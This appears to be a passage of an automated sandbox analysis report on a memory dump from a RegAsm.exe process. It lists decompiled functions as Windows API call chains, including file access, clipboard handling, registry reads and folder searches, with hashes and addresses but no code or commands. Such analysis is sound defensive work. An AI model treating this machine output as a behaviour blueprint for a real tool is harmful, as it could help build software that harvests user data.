                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressProc$FileModuleName
                                                                                  • String ID:
                                                                                  • API String ID: 3859505661-0
                                                                                  • Opcode ID: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                  • Instruction ID: eb737a8a997ed41d0f7a348c178ce8d4b8225706e43eb580f21eee6dbde26bc7
                                                                                  • Opcode Fuzzy Hash: 115f5329003125d907eaa6c1792e5f10a4de8ddb58c38107801da2991a4e6f4b
                                                                                  • Instruction Fuzzy Hash: 6FD02231B083007BEA20EE70CC00FCBA2F47F40F12F008C5AB191D2080C374C9495305
                                                                                  APIs
                                                                                  • ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileRead
                                                                                  • String ID:
                                                                                  • API String ID: 2738559852-0
                                                                                  • Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                  • Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
                                                                                  • Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
                                                                                  • Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
                                                                                  APIs
                                                                                  • WriteFile.KERNELBASE(?,00000009,?,00000000,00000000,?,?,00402F9B,?,00000000,00000000,00000000,0000017E), ref: 0040A325
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FileWrite
                                                                                  • String ID:
                                                                                  • API String ID: 3934441357-0
                                                                                  • Opcode ID: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                  • Instruction ID: 3280266517864b8de079c100525e5277478ec149926fcdeece843fe2c70d8c86
                                                                                  • Opcode Fuzzy Hash: ceb9d1a6229db680868981d1c52190471358147ed4569e3c2bde9500725be326
                                                                                  • Instruction Fuzzy Hash: CFD0C93501020DFBDF01CF81DC06FDD7BBDFB04359F108054BA1095060D7B59A20AB94
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(00000000,004457F2,00000000,000001F7,00000000), ref: 00413D30
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                  • Instruction ID: 8f6381f957debc367d4a0444659be52de1bfd3a154b3998764173f6a98a011bd
                                                                                  • Opcode Fuzzy Hash: 4aed56dde2bff02888507ea152729a1ee15f70291d16ca6bd798c1e7fc2ec88c
                                                                                  • Instruction Fuzzy Hash: 1DD0C9765002229BDB10AF26EC057857378FF00712B110425E810B7594D778BEE68ADC
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                  • Instruction ID: 15e4bfb1af8ab284213ec8af4af1ca3ed9a3c322684c6da9746693c795416a08
                                                                                  • Opcode Fuzzy Hash: 5246709bc6ec1dabf70528f5ad42ffc01d78c7e2d09fe5df7c46969d7a5ea179
                                                                                  • Instruction Fuzzy Hash: A8C092B0280200BEFE224B10EC15F36755CE744700F2008247E40F40E0C1605E108524
                                                                                  APIs
                                                                                  • CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateFile
                                                                                  • String ID:
                                                                                  • API String ID: 823142352-0
                                                                                  • Opcode ID: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                  • Instruction ID: 13aef0f41518da9c32968a96bed17b980f0e8f352a8d1793a660c4ee04e7d177
                                                                                  • Opcode Fuzzy Hash: ab7a8cdf7eb8bf952c1c1b88a04d9996938fd5cdd98684eb6691b5f60f9c195d
                                                                                  • Instruction Fuzzy Hash: B8C012F02903007EFF204B10AC0AF37755DF784700F2048207E40F40E1C2B15C008524
                                                                                  APIs
                                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??3@
                                                                                  • String ID:
                                                                                  • API String ID: 613200358-0
                                                                                  • Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                  • Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
                                                                                  • Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
                                                                                  • Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?,00413603,00000000,0044557A,?,?,?,?,?,00403335,?), ref: 004135EC
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                  • Instruction ID: 97b2006ec1e2dd28fddd19cbcf35086f2a6b1d7d6d8af37d8808782836c913ed
                                                                                  • Opcode Fuzzy Hash: 844f7501f44133ba018c3401d7aef3826eb6c790b17bce713828cee3c51aa695
                                                                                  • Instruction Fuzzy Hash: C1C04C355107129BE7318F22C849793B3E8BB00767F40C818A56A85454D7BCE594CE28
                                                                                  APIs
                                                                                  • EnumResourceNamesW.KERNELBASE(?,?,Function_000148B6,00000000), ref: 0041494B
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: EnumNamesResource
                                                                                  • String ID:
                                                                                  • API String ID: 3334572018-0
                                                                                  • Opcode ID: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                  • Instruction ID: 4cd0fc1a45efe5f4a77ff86a676eea9814a6d41529a344ef69fdb726e0e13cac
                                                                                  • Opcode Fuzzy Hash: 66f1156765df5e37ef2ff2f84c2d9879992723494834984b76c3e66af834c78a
                                                                                  • Instruction Fuzzy Hash: 5CC09B355943819FD711DF108C05F1A76D5BF95705F104C397151940A0C7614014A60A
                                                                                  APIs
                                                                                  • FreeLibrary.KERNELBASE(?), ref: 0044DEB6
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FreeLibrary
                                                                                  • String ID:
                                                                                  • API String ID: 3664257935-0
                                                                                  • Opcode ID: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                  • Instruction ID: c12df66a07a312a107e4de7a98dbd39cb061029a89fa16cd2619b088cce9516a
                                                                                  • Opcode Fuzzy Hash: bc29afbdeb633a61cc40634aee98d5405fe4c9068b08d77425fcd78e2ed3a7cd
                                                                                  • Instruction Fuzzy Hash: 95C04C35D10311ABFB31AB11ED4975232A5BB00717F52006494128D065D7B8E454CB2D
                                                                                  APIs
                                                                                  • FindClose.KERNELBASE(?,0040AE21,?,00000000,00445EF5,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AEC8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CloseFind
                                                                                  • String ID:
                                                                                  • API String ID: 1863332320-0
                                                                                  • Opcode ID: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                  • Instruction ID: 0a5868f0c47a417661f40efe111cada53839b745ef6d73ffe26d621af3302058
                                                                                  • Opcode Fuzzy Hash: c351b702f3e9cabc65afcca29c8835cc335007c1b5069ed2425bca2f993f3ba3
                                                                                  • Instruction Fuzzy Hash: 06C092341506058BD62C5F38DC9A42A77A0BF4A3303B40F6CA0F3D24F0E73888538A04
                                                                                  APIs
                                                                                  • RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Open
                                                                                  • String ID:
                                                                                  • API String ID: 71445658-0
                                                                                  • Opcode ID: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                  • Instruction ID: 4e31294bd56c0fd8f54a78566f459ab053e1b17b284f5820c9a90ca28514d216
                                                                                  • Opcode Fuzzy Hash: cea4c8dffb5a7e03adddd135b873dbda16caaf5da1da7b073e7ed9ea122c33c6
                                                                                  • Instruction Fuzzy Hash: C4C09B35544311BFDE114F40FD09F09BB61BB84B05F004414B254640B182714414EB17
                                                                                  APIs
                                                                                  • GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID:
                                                                                  • API String ID: 3188754299-0
                                                                                  • Opcode ID: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                  • Instruction ID: 3e515636d229e53f9e638efbf3d1d2cf0185fd636b5c9b7db17c068ea44c501e
                                                                                  • Opcode Fuzzy Hash: 58881c252121c77da0d0db5638804f50f66f4a7a85cb6d231bcd6b2301be346c
                                                                                  • Instruction Fuzzy Hash: B9B012792104005BCB0807349C4904D35507F456317200B3CF033C00F0D730CC61BA00
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID:
                                                                                  • API String ID:
                                                                                  • Opcode ID: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                  • Instruction ID: 186a7b248be49691fb09735f75239c469d17650efe27a5986e87276cb9a2b443
                                                                                  • Opcode Fuzzy Hash: f464ccbab3ddc34ea334660331f976908ef01721c951a33d0f0b075526a08e67
                                                                                  • Instruction Fuzzy Hash: E8318B31901616EFDF24AF25D8417DA73A0FF04314F10416BF91497251DB38ADE18BDA
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 004095FC
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 004091B8: memset.MSVCRT ref: 004091E2
                                                                                    • Part of subcall function 004091B8: memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,00000143,00000000), ref: 004092C9
                                                                                    • Part of subcall function 004091B8: memcmp.MSVCRT(00000000,0045A4F0,00000006,?,?,?,?,?,?,?,?,?,?,?,?,00000143), ref: 004092D9
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memsetwcslen$AttributesFilememcmpmemcpywcscatwcscpy
                                                                                  • String ID:
                                                                                  • API String ID: 3655998216-0
                                                                                  • Opcode ID: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                  • Instruction ID: 072a19641c33d96fdc78833b4ff670bebeeceb9371718ab52934a970b5968781
                                                                                  • Opcode Fuzzy Hash: e30004be4bbbfeced16a1849f7c4d541b3adc094efc719b7744e08ea692a1bc4
                                                                                  • Instruction Fuzzy Hash: F311607290021D6AEF20A662DC4AE9B376CEF41318F10047BB908E51D2EA79DE548659
                                                                                  APIs
                                                                                  • memset.MSVCRT ref: 00445426
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                    • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                    • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                    • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                    • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                    • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                    • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                    • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: memset$Filewcslen$AttributesCreatewcscatwcscpywcsrchr
                                                                                  • String ID:
                                                                                  • API String ID: 1828521557-0
                                                                                  • Opcode ID: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                  • Instruction ID: 9d1500c39017731ad640c46c84131142cb98d7893e2d711cbdbff08f65233ce4
                                                                                  • Opcode Fuzzy Hash: ea4a949cbb04dc179977b6e9e50e7a1e4e6e0668b18cbdf2d6b9d2270a501428
                                                                                  • Instruction Fuzzy Hash: 4B1186B294011D7BEB10E751DC4AFDB776CEF51328F10047FB518A50C2E6B8AAC486A9
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcsicmp
                                                                                  • String ID:
                                                                                  • API String ID: 2081463915-0
                                                                                  • Opcode ID: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                  • Instruction ID: 44e68c08f8902dbc9d3bec9e3d7b81d72528a2b8c41660eeece459a1934edfa0
                                                                                  • Opcode Fuzzy Hash: b978923b786281d4dff967b9753de8351d719aa9e76d1b7e7943c841c1b1a5dc
                                                                                  • Instruction Fuzzy Hash: 0C118CB1600205AFD710DF65C8809AAB7F8FF44314F11843EE55AE7240EB34F9658B68
                                                                                  APIs
                                                                                    • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
                                                                                    • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: File$CloseCreateErrorHandleLastRead
                                                                                  • String ID:
                                                                                  • API String ID: 2136311172-0
                                                                                  • Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                  • Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
                                                                                  • Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
                                                                                  • Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
                                                                                  APIs
                                                                                    • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,00401B44,0044E518,?,00000001,00401B95,?,00401EE4), ref: 0040B052
                                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ??2@??3@
                                                                                  • String ID:
                                                                                  • API String ID: 1936579350-0
                                                                                  • Opcode ID: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                  • Instruction ID: 89dc8af08517091935dcea8fd058adf4401913b4726dbdea6cb301b2924d739e
                                                                                  • Opcode Fuzzy Hash: d9146978952df4032bb52ee1fc914549b8afd9994305f4c2f79ca13836f6df5d
                                                                                  • Instruction Fuzzy Hash: 8FC02B7240C2100FD730FF74340205736D4CE422203028C2FE0E4D3101DB3C840103C8
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                  • Instruction ID: 84c58710a9e867f17c2d1ed9f7495b278bdfae561cd9e9721482330d0bfefd66
                                                                                  • Opcode Fuzzy Hash: 064fc9ad2ab7598503b0803575f79bda8c80cd2f5cc7d751fc92f1905ed38621
                                                                                  • Instruction Fuzzy Hash: 48C00272510B018FEB209E16C405762B3E4AF5173BF928C1D949591481D77CE4448A1D
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                  • Instruction ID: 146ea39d6618054f0b1de7ea1636ea0e57db3b52e0d7afa8327ef8e2ad9437d0
                                                                                  • Opcode Fuzzy Hash: 724fdfa704f09a621e121349248af22099a797a76fc60927f41904971c9b5f98
                                                                                  • Instruction Fuzzy Hash: 18C012B29107018BFB308E15C409322B2E4AF0072BFA18C0D9090910C2C77CD080CA18
                                                                                  APIs
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: free
                                                                                  • String ID:
                                                                                  • API String ID: 1294909896-0
                                                                                  • Opcode ID: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                  • Instruction ID: e7ff0dbf640816315c9486a8db62c76896ac9b8339bf6d895034c27267ad2de3
                                                                                  • Opcode Fuzzy Hash: c64955702a5dc36c53a796a23ab56cc8adc6c768dfa77ba71ac51c435adf9ecd
                                                                                  • Instruction Fuzzy Hash: A5A022A200820023CC00AB3CCC02A0A33880EE323EB320B0EB032C20C2CF38C830B00E
                                                                                  APIs
                                                                                  • EmptyClipboard.USER32 ref: 004098EC
                                                                                    • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                  • GetFileSize.KERNEL32(00000000,00000000), ref: 00409909
                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002), ref: 0040991A
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00409927
                                                                                  • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 0040993A
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0040994C
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00409955
                                                                                  • GetLastError.KERNEL32 ref: 0040995D
                                                                                  • CloseHandle.KERNEL32(?), ref: 00409969
                                                                                  • GetLastError.KERNEL32 ref: 00409974
                                                                                  • CloseClipboard.USER32 ref: 0040997D
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardFileGlobal$CloseErrorLast$AllocCreateDataEmptyHandleLockReadSizeUnlock
                                                                                  • String ID:
                                                                                  • API String ID: 3604893535-0
                                                                                  • Opcode ID: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                  • Instruction ID: b216396755dc4e0bfb1664a9ae46c4c33dbc75b884417c11e98c88a04b476fe2
                                                                                  • Opcode Fuzzy Hash: 92cf2ad6ca5c713dde206082ad36a5e7808ef459d862ee33826dd65d962f9f86
                                                                                  • Instruction Fuzzy Hash: 3D113D7A540204BBE7105FA6DC4CA9E7B78FB06356F10457AF902E22A1DB748901CB69
                                                                                  APIs
                                                                                  • EmptyClipboard.USER32 ref: 00409882
                                                                                  • wcslen.MSVCRT ref: 0040988F
                                                                                  • GlobalAlloc.KERNEL32(00002000,00000002,?,?,?,?,00411A1E,-00000210), ref: 0040989F
                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004098AC
                                                                                  • memcpy.MSVCRT(00000000,?,00000002,?,?,?,00411A1E,-00000210), ref: 004098B5
                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 004098BE
                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 004098C7
                                                                                  • CloseClipboard.USER32 ref: 004098D7
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpywcslen
                                                                                  • String ID:
                                                                                  • API String ID: 1213725291-0
                                                                                  • Opcode ID: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                  • Instruction ID: b754b6ca90195c8d8a6f67e3e00c953256c5cf8724ac1a445a604cc17dd28da6
                                                                                  • Opcode Fuzzy Hash: ef81b411bc32b98b0d58beac2f1626bda71a649682fb6f24e39e44ffb2f3f244
                                                                                  • Instruction Fuzzy Hash: 4AF0967B1402246BD2112FA6AC4DD2B772CFB86B56B05013AF90592251DA3448004779
                                                                                  APIs
                                                                                  • GetLastError.KERNEL32 ref: 004182D7
                                                                                    • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 004182FE
                                                                                  • FormatMessageA.KERNEL32(00001300,00000000,00000000,00000000,?,00000000,00000000), ref: 00418327
                                                                                  • LocalFree.KERNEL32(?), ref: 00418342
                                                                                  • free.MSVCRT ref: 00418370
                                                                                    • Part of subcall function 00417434: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,?,?,7591DF80,?,0041755F,?), ref: 00417452
                                                                                    • Part of subcall function 00417434: malloc.MSVCRT ref: 00417459
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000D.00000002.2590492024.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                  Similarity
                                                                                  • API ID: FormatMessage$ByteCharErrorFreeLastLocalMultiVersionWidefreemalloc
                                                                                  • String ID: OsError 0x%x (%u)
                                                                                  • API String ID: 2360000266-2664311388
                                                                                  • Opcode ID: 4fd697d7e384524c9f2c5a32db345d7fa765ac123a5e8bcccc5a3c31b8d6871e
                                                                                  • Instruction ID: 20f22e5b187e4483f2e635e74e626e0383ca95cf640bb4168ff376264581b0c9
